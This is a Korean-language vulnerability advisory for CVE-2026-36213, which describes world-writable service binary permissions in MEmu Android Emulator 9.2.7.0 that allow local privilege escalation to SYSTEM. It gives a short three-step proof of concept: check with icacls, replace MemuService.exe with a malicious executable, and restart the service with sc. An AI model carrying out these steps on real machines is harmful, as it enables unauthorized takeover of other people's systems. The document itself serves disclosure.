
CVE-2026-36213 | MEmu Android Emulator 9.2.7.0의 안전하지 않은 서비스 바이너리 권한을 통한 로컬 권한 상승 | 9.3.2에서 패치됨
CVE-2026-36213 | MEmu Android Emulator 9.2.7.0에서 안전하지 않은 서비스 바이너리 권한을 통한 로컬 권한 상승 | 9.3.2에서 패치됨
MEmu Android Emulator 9.2.7.0의 로컬 권한 상승(LPE) 취약점입니다.
MEmuSVC 서비스가 NT AUTHORITY\SYSTEM 권한으로 실행되는 동안 해당 바이너리는 모든 로컬 사용자가 쓸 수 있어 완전한 시스템 장악이 가능합니다.
| 필드 | 세부 정보 |
|---|---|
| CVE | CVE-2026-36213 |
| 제품 | MEmu Android Emulator (MicroVirt) |
| 영향을 받는 버전 | 9.2.7.0 및 이전 버전 |
| 수정된 버전 | 9.3.2 |
| CWE | CWE-732 / CWE-269 |
| CVSS v3.1 | 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK | T1574.010 |
MEmuService.exe는 안전하지 않은 NTFS 권한으로 SYSTEM 수준 Windows 서비스로 설치됩니다:
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) ← Any local user has Full Control
Everyone:(F) ← World-writable binar
:: 1단계 - 취약한 권한 확인
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
:: 2단계 - 바이너리 교체 (낮은 권한 사용자)
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
:: 3단계 - 서비스 재시작
sc stop MEmuSVC && sc start MEmuSVC
:: 결과: malicious.exe가 NT AUTHORITY\SYSTEM 권한으로 실행됨
다음 위치에서 확인 가능: https://github.com/sec-zone/Hijack-service-binaries
본 연구는 책임 있는 공개(responsible disclosure) 정책에 따라 교육 목적으로 수행되었습니다.
저자는 이 정보의 오용에 대해 책임을 지지 않습니다.
이름: Mohammad Hossein Ashofte Yazdi
Linkedin: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
Email: [email protected]